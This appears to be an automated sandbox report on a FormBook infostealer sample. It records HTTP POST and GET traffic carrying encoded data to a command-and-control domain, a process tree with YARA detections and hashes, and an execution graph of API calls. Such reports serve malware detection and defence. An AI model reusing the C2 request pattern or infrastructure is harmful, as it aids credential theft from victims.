                                                                                                                          43192.168.2.55001993.127.192.201802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:57.344916105 CET1891OUTPOST /qfbg/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.al-madinatraders.shop
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.al-madinatraders.shop
                                                                                                                          Referer: http://www.al-madinatraders.shop/qfbg/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 49 71 62 36 74 69 53 6b 71 4a 4c 63 73 39 66 46 6a 4a 62 66 49 39 63 79 4b 38 73 68 46 63 4e 57 33 54 4d 63 46 37 4f 72 77 6e 65 71 54 78 6b 7a 65 66 53 58 58 70 2b 6d 4a 62 59 4a 63 7a 36 55 35 79 4b 2f 41 56 34 6b 35 4a 5a 74 7a 44 36 41 2b 6e 48 52 77 4a 49 5a 56 59 52 57 73 2f 51 78 66 44 30 48 43 6f 79 57 58 37 72 6a 62 7a 63 41 57 50 50 7a 52 63 33 31 79 5a 6b 4c 34 44 36 6b 73 57 49 4e 78 34 59 66 65 79 66 43 52 7a 36 6d 6f 61 4d 4c 73 42 53 50 42 50 4e 46 44 38 49 73 77 54 2f 54 41 73 6b 33 78 57 49 64 6e 52 57 45 49 65 5a 77 41 4e 70 65 4f 57 72 77 66 6d 4e 5a 36 33 34 49 61 2b 5a 35 74 61 53 6a 56 2f 30 76 43 38 77 69 62 35 6e 46 7a 50 78 50 6b 65 58 70 30 45 33 53 34 64 56 37 79 70 5a 73 4e 34 69 2f 4e 59 74 5a 69 32 61 6c 47 6a 39 30 30 48 39 6b 41 53 30 50 35 4a 53 30 58 6c 66 63 33 71 64 4c 67 4c 6e 44 48 62 51 6e 6a 48 50 38 64 37 36 31 67 51 56 74 38 50 30 78 47 4f 35 4a 71 65 53 4c 39 32 36 76 77 59 4f 63 65 76 67 33 51 31 36 63 7a 47 46 56 54 4c 37 72 77 5a 39 55 66 49 31 [TRUNCATED]
                                                                                                                          Data Ascii: V8=Iqb6tiSkqJLcs9fFjJbfI9cyK8shFcNW3TMcF7OrwneqTxkzefSXXp+mJbYJcz6U5yK/AV4k5JZtzD6A+nHRwJIZVYRWs/QxfD0HCoyWX7rjbzcAWPPzRc31yZkL4D6ksWINx4YfeyfCRz6moaMLsBSPBPNFD8IswT/TAsk3xWIdnRWEIeZwANpeOWrwfmNZ634Ia+Z5taSjV/0vC8wib5nFzPxPkeXp0E3S4dV7ypZsN4i/NYtZi2alGj900H9kAS0P5JS0Xlfc3qdLgLnDHbQnjHP8d761gQVt8P0xGO5JqeSL926vwYOcevg3Q16czGFVTL7rwZ9UfI195xh6AZQzmo3NP+b8FlJwN34yHT5LEEa8HoTQOsDTx2K+JAYEiq9jRA2IsW9x7svBdrkafmQ00z/FgvUoL3jMrK/ZSawyP9vmfaSs4FBDRdPBZjXvRiz987mLSeZ9sysyBqV49pxEds2+VY2hE1KS8sRj+VVS6uqPHBpGIbLxqqUyLcxkeQQLuunxTgkh8S6P2d5YLy/i9+pcB3k+b7QkavVnRf8+aHdr/d+K0pHfQYzp2BdcY96bF+F5gXsxEAsVQJGdQqLdjBSPjqtBBSObUJItEUOqlQnhyeVbqNURgeQKXjdJ0qU6+c8vkIquhhwUUS9RhpRRfstC6uNSN8vA3wNI7D2p5J0wRgjO4X3sj4iLJGTm3JbF3dU0KBN80RMdJdR2YrTrkjPg9M9F2LIjBRQQtwUf3Nkcvtzk64sMNFTHt56RilTomL1tSWFiNu1TJYTzz/1BUE01duZGX6IPuUrEz9Jk7urNz1nlBr1y6u1y/ujlk+LLuv0uIQ4bvdfdxl6esn59R4Lf8KOjQ4EAgYnWpWjPbiepTD/DMLa7UVtjDoyamlNjpe9qfS7A5C3OeJsdo80n3f550kKMLni4tKJa5jzbgh3FebUa8A+qXMHZ031WDNAhoY7ZH+cdSd4S9iRTGv4thTeofMYGQydSrU7JeS4fs0Jq5 [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:44:57.939332008 CET715INHTTP/1.1 403 Forbidden
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/5.6.40
                                                                                                                          set-cookie: csrf_cookie_name=d5496703b2e2cd91e435e2cfe33cb86a; expires=Fri, 10-Jan-2025 17:44:57 GMT; Max-Age=7200; path=/
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          content-length: 196
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          date: Fri, 10 Jan 2025 15:44:57 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00
                                                                                                                          Data Ascii: -On0`B4V*iNp8|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K|pC9};bV


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.55002093.127.192.201802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:44:59.897289991 CET584OUTGET /qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.al-madinatraders.shop
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:45:00.490494013 CET706INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/5.6.40
                                                                                                                          set-cookie: csrf_cookie_name=7078c20c62b822c92d1ce806daae05bb; expires=Fri, 10-Jan-2025 17:45:00 GMT; Max-Age=7200; path=/
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          content-length: 234
                                                                                                                          date: Fri, 10 Jan 2025 15:45:00 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:10:40:56
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\NWPZbNcRxL.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\NWPZbNcRxL.exe"
                                                                                                                          Imagebase:0xc10000
                                                                                                                          File size:1'255'936 bytes
                                                                                                                          MD5 hash:37148A3441BCC11C173F13E149C7284B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:10:40:57
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\NWPZbNcRxL.exe"
                                                                                                                          Imagebase:0x760000
                                                                                                                          File size:46'504 bytes
                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:10:41:25
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe"
                                                                                                                          Imagebase:0x80000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:5
                                                                                                                          Start time:10:41:27
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\logman.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\logman.exe"
                                                                                                                          Imagebase:0x650000
                                                                                                                          File size:98'816 bytes
                                                                                                                          MD5 hash:AE108F4DAAB2DD68470AC41F91A7A4E9
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:7
                                                                                                                          Start time:10:41:40
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe"
                                                                                                                          Imagebase:0x80000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:8
                                                                                                                          Start time:10:41:52
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                          Imagebase:0x7ff79f9e0000
                                                                                                                          File size:676'768 bytes
                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                            Signature Coverage:6.6%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:159
                                                                                                                            execution_graph 104018 1027390 104032 1024fe0 104018->104032 104020 1027443 104035 1027280 104020->104035 104038 1028470 GetPEB 104032->104038 104034 102566b 104034->104020 104036 1027289 Sleep 104035->104036 104037 1027297 104036->104037 104039 102849a 104038->104039 104039->104034 104040 c13633 104041 c1366a 104040->104041 104042 c136e7 104041->104042 104043 c13688 104041->104043 104080 c136e5 104041->104080 104045 c4d0cc 104042->104045 104046 c136ed 104042->104046 104047 c13695 104043->104047 104048 c1374b PostQuitMessage 104043->104048 104044 c136ca DefWindowProcW 104082 c136d8 104044->104082 104089 c21070 10 API calls Mailbox 104045->104089 104049 c136f2 104046->104049 104050 c13715 SetTimer RegisterWindowMessageW 104046->104050 104052 c4d154 104047->104052 104053 c136a0 104047->104053 104048->104082 104054 c136f9 KillTimer 104049->104054 104055 c4d06f 104049->104055 104057 c1373e CreatePopupMenu 104050->104057 104050->104082 104105 c72527 71 API calls _memset 104052->104105 104058 c13755 104053->104058 104059 c136a8 104053->104059 104085 c1443a Shell_NotifyIconW _memset 104054->104085 104061 c4d074 104055->104061 104062 c4d0a8 MoveWindow 104055->104062 104056 c4d0f3 104090 c21093 341 API calls Mailbox 104056->104090 104057->104082 104087 c144a0 64 API calls _memset 104058->104087 104065 c136b3 104059->104065 104066 c4d139 104059->104066 104069 c4d097 SetFocus 104061->104069 104070 c4d078 104061->104070 104062->104082 104072 c136be 104065->104072 104073 c4d124 104065->104073 104066->104044 104104 c67c36 59 API calls Mailbox 104066->104104 104067 c4d166 104067->104044 104067->104082 104069->104082 104070->104072 104075 c4d081 104070->104075 104071 c1370c 104086 c13114 DeleteObject DestroyWindow Mailbox 104071->104086 104072->104044 104091 c1443a Shell_NotifyIconW _memset 104072->104091 104103 c72d36 81 API calls _memset 104073->104103 104074 c13764 104074->104082 104088 c21070 10 API calls Mailbox 104075->104088 104080->104044 104083 c4d118 104092 c1434a 104083->104092 104085->104071 104086->104082 104087->104074 104088->104082 104089->104056 104090->104072 104091->104083 104093 c14375 _memset 104092->104093 104106 c14182 104093->104106 104096 c143fa 104098 c14430 Shell_NotifyIconW 104096->104098 104099 c14414 Shell_NotifyIconW 104096->104099 104100 c14422 104098->104100 104099->104100 104110 c1407c 104100->104110 104102 c14429 104102->104080 104103->104074 104104->104080 104105->104067 104107 c4d423 104106->104107 104108 c14196 104106->104108 104107->104108 104109 c4d42c DestroyIcon 104107->104109 104108->104096 104132 c72f94 62 API calls _W_store_winword 104108->104132 104109->104108 104111 c14098 104110->104111 104131 c1416f Mailbox 104110->104131 104133 c17a16 104111->104133 104114 c140b3 104138 c17bcc 104114->104138 104115 c4d3c8 LoadStringW 104118 c4d3e2 104115->104118 104117 c140c8 104117->104118 104119 c140d9 104117->104119 104120 c17b2e 59 API calls 104118->104120 104121 c140e3 104119->104121 104122 c14174 104119->104122 104125 c4d3ec 104120->104125 104147 c17b2e 104121->104147 104156 c18047 104122->104156 104128 c140ed _memset _wcscpy 104125->104128 104160 c17cab 104125->104160 104127 c4d40e 104130 c17cab 59 API calls 104127->104130 104129 c14155 Shell_NotifyIconW 104128->104129 104129->104131 104130->104128 104131->104102 104132->104096 104167 c30db6 104133->104167 104135 c17a3b 104177 c18029 104135->104177 104139 c17c45 104138->104139 104140 c17bd8 __wsetenvp 104138->104140 104209 c17d2c 104139->104209 104142 c17c13 104140->104142 104143 c17bee 104140->104143 104145 c18029 59 API calls 104142->104145 104208 c17f27 59 API calls Mailbox 104143->104208 104146 c17bf6 _memmove 104145->104146 104146->104117 104148 c17b40 104147->104148 104149 c4ec6b 104147->104149 104217 c17a51 104148->104217 104223 c67bdb 59 API calls _memmove 104149->104223 104152 c17b4c 104152->104128 104153 c4ec75 104154 c18047 59 API calls 104153->104154 104155 c4ec7d Mailbox 104154->104155 104157 c18052 104156->104157 104158 c1805a 104156->104158 104224 c17f77 59 API calls 2 library calls 104157->104224 104158->104128 104161 c4ed4a 104160->104161 104162 c17cbf 104160->104162 104164 c18029 59 API calls 104161->104164 104225 c17c50 104162->104225 104166 c4ed55 __wsetenvp _memmove 104164->104166 104165 c17cca 104165->104127 104170 c30dbe 104167->104170 104169 c30dd8 104169->104135 104170->104169 104172 c30ddc std::exception::exception 104170->104172 104180 c3571c 104170->104180 104197 c333a1 DecodePointer 104170->104197 104198 c3859b RaiseException 104172->104198 104174 c30e06 104199 c384d1 58 API calls _free 104174->104199 104176 c30e18 104176->104135 104178 c30db6 Mailbox 59 API calls 104177->104178 104179 c140a6 104178->104179 104179->104114 104179->104115 104181 c35797 104180->104181 104189 c35728 104180->104189 104206 c333a1 DecodePointer 104181->104206 104183 c3579d 104207 c38b28 58 API calls __getptd_noexit 104183->104207 104186 c3575b RtlAllocateHeap 104186->104189 104196 c3578f 104186->104196 104188 c35783 104204 c38b28 58 API calls __getptd_noexit 104188->104204 104189->104186 104189->104188 104193 c35733 104189->104193 104194 c35781 104189->104194 104203 c333a1 DecodePointer 104189->104203 104193->104189 104200 c3a16b 58 API calls 2 library calls 104193->104200 104201 c3a1c8 58 API calls 8 library calls 104193->104201 104202 c3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104193->104202 104205 c38b28 58 API calls __getptd_noexit 104194->104205 104196->104170 104197->104170 104198->104174 104199->104176 104200->104193 104201->104193 104203->104189 104204->104194 104205->104196 104206->104183 104207->104196 104208->104146 104210 c17d43 _memmove 104209->104210 104211 c17d3a 104209->104211 104210->104146 104211->104210 104213 c17e4f 104211->104213 104214 c17e62 104213->104214 104216 c17e5f _memmove 104213->104216 104215 c30db6 Mailbox 59 API calls 104214->104215 104215->104216 104216->104210 104218 c17a5f 104217->104218 104222 c17a85 _memmove 104217->104222 104219 c30db6 Mailbox 59 API calls 104218->104219 104218->104222 104220 c17ad4 104219->104220 104221 c30db6 Mailbox 59 API calls 104220->104221 104221->104222 104222->104152 104223->104153 104224->104158 104226 c17c5f __wsetenvp 104225->104226 104227 c18029 59 API calls 104226->104227 104228 c17c70 _memmove 104226->104228 104229 c4ed07 _memmove 104227->104229 104228->104165 104230 c11055 104235 c12649 104230->104235 104245 c17667 104235->104245 104240 c12754 104241 c1105a 104240->104241 104253 c13416 59 API calls 2 library calls 104240->104253 104242 c32d40 104241->104242 104261 c32c44 104242->104261 104244 c11064 104246 c30db6 Mailbox 59 API calls 104245->104246 104247 c17688 104246->104247 104248 c30db6 Mailbox 59 API calls 104247->104248 104249 c126b7 104248->104249 104250 c13582 104249->104250 104254 c135b0 104250->104254 104253->104240 104255 c135bd 104254->104255 104256 c135a1 104254->104256 104255->104256 104257 c135c4 RegOpenKeyExW 104255->104257 104256->104240 104257->104256 104258 c135de RegQueryValueExW 104257->104258 104259 c13614 RegCloseKey 104258->104259 104260 c135ff 104258->104260 104259->104256 104260->104259 104262 c32c50 __close 104261->104262 104269 c33217 104262->104269 104268 c32c77 __close 104268->104244 104286 c39c0b 104269->104286 104271 c32c59 104272 c32c88 DecodePointer DecodePointer 104271->104272 104273 c32c65 104272->104273 104274 c32cb5 104272->104274 104283 c32c82 104273->104283 104274->104273 104332 c387a4 59 API calls __wtof_l 104274->104332 104276 c32d18 EncodePointer EncodePointer 104276->104273 104277 c32cec 104277->104273 104281 c32d06 EncodePointer 104277->104281 104334 c38864 61 API calls 2 library calls 104277->104334 104278 c32cc7 104278->104276 104278->104277 104333 c38864 61 API calls 2 library calls 104278->104333 104281->104276 104282 c32d00 104282->104273 104282->104281 104335 c33220 104283->104335 104287 c39c2f EnterCriticalSection 104286->104287 104288 c39c1c 104286->104288 104287->104271 104293 c39c93 104288->104293 104290 c39c22 104290->104287 104317 c330b5 58 API calls 3 library calls 104290->104317 104294 c39c9f __close 104293->104294 104295 c39cc0 104294->104295 104296 c39ca8 104294->104296 104305 c39ce1 __close 104295->104305 104321 c3881d 58 API calls 2 library calls 104295->104321 104318 c3a16b 58 API calls 2 library calls 104296->104318 104298 c39cad 104319 c3a1c8 58 API calls 8 library calls 104298->104319 104301 c39cd5 104303 c39ceb 104301->104303 104304 c39cdc 104301->104304 104302 c39cb4 104320 c3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104302->104320 104308 c39c0b __lock 58 API calls 104303->104308 104322 c38b28 58 API calls __getptd_noexit 104304->104322 104305->104290 104309 c39cf2 104308->104309 104311 c39d17 104309->104311 104312 c39cff 104309->104312 104324 c32d55 104311->104324 104323 c39e2b InitializeCriticalSectionAndSpinCount 104312->104323 104315 c39d0b 104330 c39d33 LeaveCriticalSection _doexit 104315->104330 104318->104298 104319->104302 104321->104301 104322->104305 104323->104315 104325 c32d5e RtlFreeHeap 104324->104325 104329 c32d87 __dosmaperr 104324->104329 104326 c32d73 104325->104326 104325->104329 104331 c38b28 58 API calls __getptd_noexit 104326->104331 104328 c32d79 GetLastError 104328->104329 104329->104315 104330->104305 104331->104328 104332->104278 104333->104277 104334->104282 104338 c39d75 LeaveCriticalSection 104335->104338 104337 c32c87 104337->104268 104338->104337 104339 c37c56 104340 c37c62 __close 104339->104340 104376 c39e08 GetStartupInfoW 104340->104376 104343 c37c67 104378 c38b7c GetProcessHeap 104343->104378 104344 c37cbf 104345 c37cca 104344->104345 104461 c37da6 58 API calls 3 library calls 104344->104461 104379 c39ae6 104345->104379 104348 c37cd0 104349 c37cdb __RTC_Initialize 104348->104349 104462 c37da6 58 API calls 3 library calls 104348->104462 104400 c3d5d2 104349->104400 104352 c37cea 104353 c37cf6 GetCommandLineW 104352->104353 104463 c37da6 58 API calls 3 library calls 104352->104463 104419 c44f23 GetEnvironmentStringsW 104353->104419 104356 c37cf5 104356->104353 104359 c37d10 104360 c37d1b 104359->104360 104464 c330b5 58 API calls 3 library calls 104359->104464 104429 c44d58 104360->104429 104363 c37d21 104364 c37d2c 104363->104364 104465 c330b5 58 API calls 3 library calls 104363->104465 104443 c330ef 104364->104443 104367 c37d34 104368 c37d3f __wwincmdln 104367->104368 104466 c330b5 58 API calls 3 library calls 104367->104466 104449 c147d0 104368->104449 104371 c37d53 104372 c37d62 104371->104372 104467 c33358 58 API calls _doexit 104371->104467 104468 c330e0 58 API calls _doexit 104372->104468 104375 c37d67 __close 104377 c39e1e 104376->104377 104377->104343 104378->104344 104469 c33187 36 API calls 2 library calls 104379->104469 104381 c39aeb 104470 c39d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 104381->104470 104383 c39af0 104384 c39af4 104383->104384 104472 c39d8a TlsAlloc 104383->104472 104471 c39b5c 61 API calls 2 library calls 104384->104471 104387 c39af9 104387->104348 104388 c39b06 104388->104384 104389 c39b11 104388->104389 104473 c387d5 104389->104473 104392 c39b53 104481 c39b5c 61 API calls 2 library calls 104392->104481 104395 c39b32 104395->104392 104397 c39b38 104395->104397 104396 c39b58 104396->104348 104480 c39a33 58 API calls 4 library calls 104397->104480 104399 c39b40 GetCurrentThreadId 104399->104348 104401 c3d5de __close 104400->104401 104402 c39c0b __lock 58 API calls 104401->104402 104403 c3d5e5 104402->104403 104404 c387d5 __calloc_crt 58 API calls 104403->104404 104406 c3d5f6 104404->104406 104405 c3d661 GetStartupInfoW 104408 c3d7a5 104405->104408 104410 c3d676 104405->104410 104406->104405 104407 c3d601 __close @_EH4_CallFilterFunc@8 104406->104407 104407->104352 104409 c3d86d 104408->104409 104413 c3d7f2 GetStdHandle 104408->104413 104415 c3d805 GetFileType 104408->104415 104494 c39e2b InitializeCriticalSectionAndSpinCount 104408->104494 104495 c3d87d LeaveCriticalSection _doexit 104409->104495 104410->104408 104412 c387d5 __calloc_crt 58 API calls 104410->104412 104414 c3d6c4 104410->104414 104412->104410 104413->104408 104414->104408 104416 c3d6f8 GetFileType 104414->104416 104493 c39e2b InitializeCriticalSectionAndSpinCount 104414->104493 104415->104408 104416->104414 104420 c44f34 104419->104420 104421 c37d06 104419->104421 104496 c3881d 58 API calls 2 library calls 104420->104496 104425 c44b1b GetModuleFileNameW 104421->104425 104423 c44f5a _memmove 104424 c44f70 FreeEnvironmentStringsW 104423->104424 104424->104421 104426 c44b4f _wparse_cmdline 104425->104426 104428 c44b8f _wparse_cmdline 104426->104428 104497 c3881d 58 API calls 2 library calls 104426->104497 104428->104359 104430 c44d71 __wsetenvp 104429->104430 104434 c44d69 104429->104434 104431 c387d5 __calloc_crt 58 API calls 104430->104431 104439 c44d9a __wsetenvp 104431->104439 104432 c44df1 104433 c32d55 _free 58 API calls 104432->104433 104433->104434 104434->104363 104435 c387d5 __calloc_crt 58 API calls 104435->104439 104436 c44e16 104437 c32d55 _free 58 API calls 104436->104437 104437->104434 104439->104432 104439->104434 104439->104435 104439->104436 104440 c44e2d 104439->104440 104498 c44607 58 API calls __wtof_l 104439->104498 104499 c38dc6 IsProcessorFeaturePresent 104440->104499 104442 c44e39 104442->104363 104444 c330fb __IsNonwritableInCurrentImage 104443->104444 104522 c3a4d1 104444->104522 104446 c33119 __initterm_e 104447 c32d40 __cinit 67 API calls 104446->104447 104448 c33138 __cinit __IsNonwritableInCurrentImage 104446->104448 104447->104448 104448->104367 104450 c147ea 104449->104450 104460 c14889 104449->104460 104451 c14824 IsThemeActive 104450->104451 104525 c3336c 104451->104525 104455 c14850 104537 c148fd SystemParametersInfoW SystemParametersInfoW 104455->104537 104457 c1485c 104538 c13b3a 104457->104538 104459 c14864 SystemParametersInfoW 104459->104460 104460->104371 104461->104345 104462->104349 104463->104356 104467->104372 104468->104375 104469->104381 104470->104383 104471->104387 104472->104388 104474 c387dc 104473->104474 104476 c38817 104474->104476 104478 c387fa 104474->104478 104482 c451f6 104474->104482 104476->104392 104479 c39de6 TlsSetValue 104476->104479 104478->104474 104478->104476 104490 c3a132 Sleep 104478->104490 104479->104395 